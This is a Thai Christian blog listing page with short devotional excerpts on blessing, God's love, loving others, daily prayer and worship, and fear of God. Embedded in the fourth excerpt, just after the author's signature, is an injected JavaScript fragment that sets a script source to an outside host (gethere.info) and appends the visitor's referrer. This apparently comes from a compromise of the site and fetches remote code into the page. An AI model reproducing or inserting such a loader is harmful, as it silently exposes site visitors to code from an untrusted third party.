บทความ

p19tis8aui1j7eu9uh849s0kjbb
06 พ.ค.

ชีวิตที่ได้รับพร

พระเจ้ามักจะใช้ และอวยพระพร คนที่มีจิตใจที่ดี ไม่คิดทำร้ายใคร ไม่นินทา ว่าร้าย ไม่ประชดประชัน ทั้งที่มีโอกาส คริสตชน ได้รับพรจากพระเจ้า ทั้งที่เป็นคนไม่เก่ง การศึกษาอาจไม่สูง แต่มีการเจิมพระเจ้าใช้มาก เพราะเขาไม่มีพิษภัยต่อใคร เพราะ ใจสะอาดทั้งคำพูด และ การเขียน ต่อหน้าลับหลัง จึงหนุนใจพี่น้อง ทุกคนว่า ทางของพระเจ้านั้น...

p19tk4j4ule7b1qi81c851t871ah2a
06 พ.ค.

ความรักของพระเจ้าเป็นแบบไหน

ความรักของพระองค์มี 3 ระดับ ระดับ 1 พระบิดาผู้ทรงรัก ไม่มีเงื่อนไข หากกลับใจ เริ่มทใหม่ พระองค์ทรงให้อภัย ระดับ 2 พระบิดาผู้ทรงขัดเกลา ในจุดนี้ มี สองแนว แนวระนาบ คือ มาจากคน Mentor ที่ขัดเกลา ในมโนธนนม ความเป็นผู้ใหญ่...

JesusLoveYou
06 พ.ค.

ชีวิต กับ การเป็นแบบอย่าง

พระเจ้า ทรงสอน เรา ให้ ดำเนินชีวิต ด้วยความรัก 1. ความรักจะไม่ทำร้ายผู้อื่น 2. ความรักไม่เอาเปรียบผู้อื่น 3. ความรักจะส่งเสริมผู้อื่น 4. เชื่อในส่วนดีอยู่เสมอ โรม 13:10 ความรักไม่ทำอันตรายเพื่อนบ้านเลย เหตุฉะนั้นความรักจึงเป็นการปฏิบัติตามธรรมบัญญัติอย่างครบถ้วน ศาสนคริสต์เป็นศาสนา ที่ขับเคลื่อน ด้วยความรัก เราเป็นครอบครัว มีพ่อองค์เดียวกันคือพระบิดา เราเป็นพี่น้องฝ่ายวิญญาณ ในวันนี้ และต่อไปบนสวรรค์ ครอบครัวใหญ่...

p19tiqscrlk3qqj7fmk52u11dc8
06 พ.ค.

จิตวิญญาณจะแข็งแกร่งทุกวัน

จิตวิญญาณจะแข็งแกร่งทุกวัน (เรื่องนีเป็นชีวิตไม่ใช่ตัวเลือก คริสเตียนต้องทำ) 1. ร้องเพลงนมัสการสักเพลง หลายรอบ จนกว่า ใจจะอิ่ม ทุกคนน่าจะมีเพลงประจำตัว 2. อธิษฐาน ทูลขอ ขอบคุณ ภาษาแปลกๆประจำ จนกว่าจะอิ่มใจ 3. อ่าน พระคัมภีร์ จนกว่าจะมีคำเด็ด สะกิดใจ หากทำประจำจิตวิญญาณท่านจะแกร่ง เติบโต อ.เจริญ ยธิกุลs.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer)...

p19tk4j4up199mhva4001su81em3n
06 พ.ค.

ความยำเกรงพระเจ้า เป็นบ่อเกิดแห่งปัญญา

ความว่า ยำเกรงพระเจ้าคือ เกรงใจ ให้เกียรติ ยกย่อง เกรงกลัว เชื่อฟัง การยำเกรงมี 3 ด้าน 1. ด้านชีวิตส่วนตัว คือ การดำเนินชีวิต ประจำวัน ทำงาน รับใช้ เสมือนกำลังอยู่ต่อหน้าพระเจ้า ฮีบรู 4:13ไม่มีสิ่งหนึ่งสิ่งใดซ่อนไว้พ้นพระเนตรพระองค์ แต่ตรงข้ามทุกสิ่งปรากฏแจ้งต่อพระองค์ผู้ซึ่งเราต้องสัมพันธ์ด้วย สุภาษิต 3:7 อย่าคิดว่าตนฉลาด...